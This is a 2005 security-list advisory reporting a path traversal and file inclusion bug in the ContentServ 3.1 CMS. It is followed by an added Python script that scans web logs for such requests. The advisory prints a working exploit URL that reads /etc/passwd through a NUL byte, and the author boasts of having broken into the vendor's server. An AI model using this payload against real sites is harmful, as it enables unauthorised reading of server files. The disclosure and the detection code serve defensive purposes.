Date: Sun Sep 25 14:36:13 2005
From: qobaiashi at gmx.net (qobaiashi@....net)
Subject: ContentServ features remote file disclosure

----------------------------------------------------------------------
--[ ContentServ (still) features remote reading of arbitrary files ]--
-------------------------[ qobaiashi@....net ]------------------------

/*  Boring PHP bug warning:
 *  """"""""""""""""""""""""""""""
 *  By reading boring PHP bug advisories it is possible to 
 *  fall asleep (if not affected) instantly w/o a warning!
 *  
 *  I told you, it's your decision now.
 */

ContentServ is a CMS developed by ... ContentServ.de and is a quite
commonly used CMS, at least in .de.

Some months ago while pentesting www.contentserv.com I found a bug
(yo alex, I rooted you back then but somehow you didn't need sec support)
in ContentServ 3.1, which - to my surprise - is still accessible on some
installations. Somebody should have read the apache logs over there ;)
I had some fun with it (the bug and your server) back then.

The bug resides in /admin/about.php:
[...]
        include("../$ctsWebsite/data/config.php");
[...]


This boils down to a damn stupid:

www.we-cant-design-our-hp.com/contentserv/3.1/admin/about.php?
ctsWebsite=../../../../../../../../../../etc/passwd%00

to give you some information.

-----------------------------
Disclosure timeline:

Bug found:      2004
Bug disclosed:  Son Sep 25 16:04:40 CEST 2005
Bug fixed:      ask your vendor

have fun.
-q
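
Added example (not part of the original post or of ContentServ): a log review script that flags requests to admin/about.php whose ctsWebsite value contains directory traversal, a NUL byte or a path separator, including percent-encoded forms. The log lines are constructed samples, and the rule that a legitimate site name is a plain directory name is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [25/Sep/2005:14:01:02 +0200] "GET /contentserv/3.1/admin/about.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.44 - - [25/Sep/2005:14:03:17 +0200] "GET /contentserv/3.1/admin/about.php?ctsWebsite=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1432 "-" "-"
192.0.2.44 - - [25/Sep/2005:14:03:40 +0200] "GET /contentserv/3.1/admin/about.php?ctsWebsite=%252e%252e%252fdata HTTP/1.1" 200 310 "-" "-"
192.0.2.51 - - [25/Sep/2005:14:05:09 +0200] "GET /contentserv/3.1/admin/about.php?ctsWebsite=demo_site HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) ')
# Assumption: a legitimate site name is a plain directory name.
SAFE_SITE_RE = re.compile(r'[A-Za-z0-9_-]+')

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (%252e -> %2e -> .)."""
    for _ in range(rounds):
        decoded = unquote(value, encoding="latin-1")
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(log_text, script="/admin/about.php", param="ctsWebsite"):
    """Return (client, timestamp, status, reasons) for each flagged request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, when, _method, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.endswith(script):
            continue
        for name, raw in parse_qsl(url.query, keep_blank_values=True, encoding="latin-1"):
            value = fully_decode(raw)
            if name != param or SAFE_SITE_RE.fullmatch(value):
                continue
            checks = (("traversal", ".." in value),
                      ("null-byte", "\x00" in value),
                      ("path-separator", "/" in value or "\\" in value))
            reasons = [label for label, bad in checks if bad]
            hits.append((client, when, int(status), reasons or ["unexpected-characters"]))
    return hits

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

A flagged request that was answered with status 200 is the one to follow up on first, since the include may have returned file contents.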
